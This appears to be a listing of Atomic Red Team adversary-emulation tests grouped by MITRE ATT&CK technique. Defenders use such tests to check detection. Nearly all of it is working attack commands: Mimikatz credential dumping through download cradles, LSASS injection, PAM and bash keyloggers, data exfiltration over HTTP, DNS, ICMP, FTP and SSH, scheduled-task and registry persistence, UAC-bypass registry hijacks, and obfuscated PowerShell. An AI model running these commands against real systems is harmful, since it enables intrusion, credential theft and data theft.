command_promptwindowsDisable NLA for RDP via Command Prompt

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f

T1021.002 SMB/Windows Admin Shares · 4 tests

command_promptwindowsMap admin share

cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"

powershellwindowsMap Admin Share PowerShell

New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}

command_promptelevatedwindowsCopy and Execute File with PsExec

"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}

command_promptelevatedwindowsExecute command writing output to local Admin Share

cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1

T1021.004 SSH · 2 tests

powershellelevatedwindowsESXi - Enable SSH via PowerCLI

Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false

command_promptwindowsESXi - Enable SSH via VIM-CMD

echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"

T1021.006 Windows Remote Management · 3 tests

powershellelevatedwindowsEnable Windows Remote Management

Enable-PSRemoting -Force

powershellwindowsRemote Code Execution with PS Credentials Using Invoke-Command

Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}

powershellelevatedwindowsWinRM Access with Evil-WinRM

evil-winrm -i #{destination_address} -u #{user_name} -p #{password}

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1027.001 Binary Padding · 2 tests

shlinux, macosPad Binary to Change Hash - Linux/macOS dd

dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data

shlinux, macosPad Binary to Change Hash using truncate command - Linux/macOS

truncate -s +1 #{file_to_pad} #adds a byte to the file size

T1027.002 Software Packing · 4 tests

shlinuxBinary simply packed by UPX (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shlinuxBinary packed by UPX, with modified headers (linux)

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary simply packed by UPX

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

shmacosBinary packed by UPX, with modified headers

cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin

T1027.013 Encrypted/Encoded File · 3 tests

powershellwindows, macos, linuxDecode Eicar File and Write to File

$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt

powershellwindows, macos, linuxDecrypt Eicar File and Write to File

$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt

bashlinux, macosPassword-Protected ZIP Payload Extraction and Execution

echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh

T1033 System Owner/User Discovery · 7 tests

command_promptwindowsSystem Owner/User Discovery

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

shlinux, macosSystem Owner/User Discovery

users
w
who

powershellwindowsFind computers where user has session - Stealth mode (PowerView)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

powershellwindowsUser Discovery With Env Vars PowerShell Script

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

powershellwindowsGetCurrent User with PowerShell Script

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

powershellwindowsSystem Discovery - SocGholish whoami

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

command_promptwindowsSystem Owner/User Discovery Using Command Prompt

set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1041 Exfiltration Over C2 Channel · 2 tests

powershellwindowsC2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

powershellwindowsText Based Data Exfiltration using DNS subdomains

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

T1047 Windows Management Instrumentation · 10 tests

command_promptwindowsWMI Reconnaissance Users

wmic useraccount get /ALL /format:csv

command_promptwindowsWMI Reconnaissance Processes

wmic process get caption,executablepath,commandline /format:csv

command_promptwindowsWMI Reconnaissance Software

wmic qfe get description,installedOn /format:csv

command_promptwindowsWMI Reconnaissance List Remote Services

wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")

command_promptwindowsWMI Execute Local Process

wmic process call create #{process_to_execute}

command_promptwindowsWMI Execute Remote Process

wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}

command_promptwindowsCreate a Process using WMI Query and an Encoded Command

powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA

powershellelevatedwindowsCreate a Process using obfuscated Win32_Process

$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}

command_promptwindowsWMI Execute rundll32

wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"

command_promptelevatedwindowsApplication uninstall using WMIC

wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall

T1048 Exfiltration Over Alternative Protocol · 4 tests

shmacos, linuxExfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

shmacos, linuxExfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

powershellwindowsDNSExfiltration (doh)

Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

bashmacos, linuxExfiltrate Data using DNS Queries via dig

dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com

T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol · 8 tests

manualmacos, linuxExfiltration Over Alternative Protocol - HTTP

powershellwindowsExfiltration Over Alternative Protocol - ICMP

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }

manuallinuxExfiltration Over Alternative Protocol - DNS

powershellwindowsExfiltration Over Alternative Protocol - HTTP

$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content

powershellwindowsExfiltration Over Alternative Protocol - SMTP

Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}

powershellwindowsMAZE FTP Upload

$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}

powershellelevatedwindowsExfiltration Over Alternative Protocol - FTP - Rclone

$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate

shlinuxPython3 http.server

[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi

T1049 System Network Connections Discovery · 7 tests

command_promptwindowsSystem Network Connections Discovery

netstat -ano
net use
net sessions 2>nul

powershellwindowsSystem Network Connections Discovery with PowerShell

Get-NetTCPConnection

powershellwindowsSystem Network Connections Discovery via PowerShell (Process Mapping)

Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize

bashlinux, macosSystem Network Connections Discovery via ss or lsof (Linux/MacOS)

if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi

shlinux, macosSystem Network Connections Discovery FreeBSD, Linux & MacOS

netstat
who -a

shlinuxSystem Network Connections Discovery via sockstat (Linux, FreeBSD)

sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true

powershellelevatedwindowsSystem Discovery using SharpView

$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1055 Process Injection · 13 tests

powershellwindowsShellcode execution via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

command_promptwindowsRemote Process Injection in LSASS via mimikatz

"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

powershellwindowsSection View Injection

$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"

powershellwindowsDirty Vanity process Injection

Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}

powershellelevatedwindowsRead-Write-Execute process Injection

$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address

powershellwindowsProcess Injection with Go using UuidFromStringA WinAPI

$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug

powershellwindowsProcess Injection with Go using EtwpCreateEtwThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug

powershellwindowsRemote Process Injection with Go using RtlCreateUserThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI (Natively)

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI (Natively)

$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug

powershellelevatedwindowsUUID custom process Injection

Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force

T1055.001 Dynamic-link Library Injection · 2 tests

powershellelevatedwindowsProcess Injection via mavinject.exe

$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad

powershellwindowsWinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')

T1056.001 Keylogging · 8 tests

powershellelevatedwindowsInput Capture

&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath}

shelevatedlinuxLiving off the land Terminal Input Capture on Linux with pam.d

if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth

shelevatedlinuxLogging bash history to syslog

PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog

shelevatedlinuxLogging sh history to syslog/messages

PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages

bashlinuxBash session based keylogger

trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}

shelevatedlinuxSSHD PAM keylogger

cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh #{user_account}@localhost 
whoami
sudo su
whoami
exit
exit

shelevatedlinuxAuditd keylogger

auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start now

bashmacosMacOS Swift Keylogger

swift #{swift_src} -keylog

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

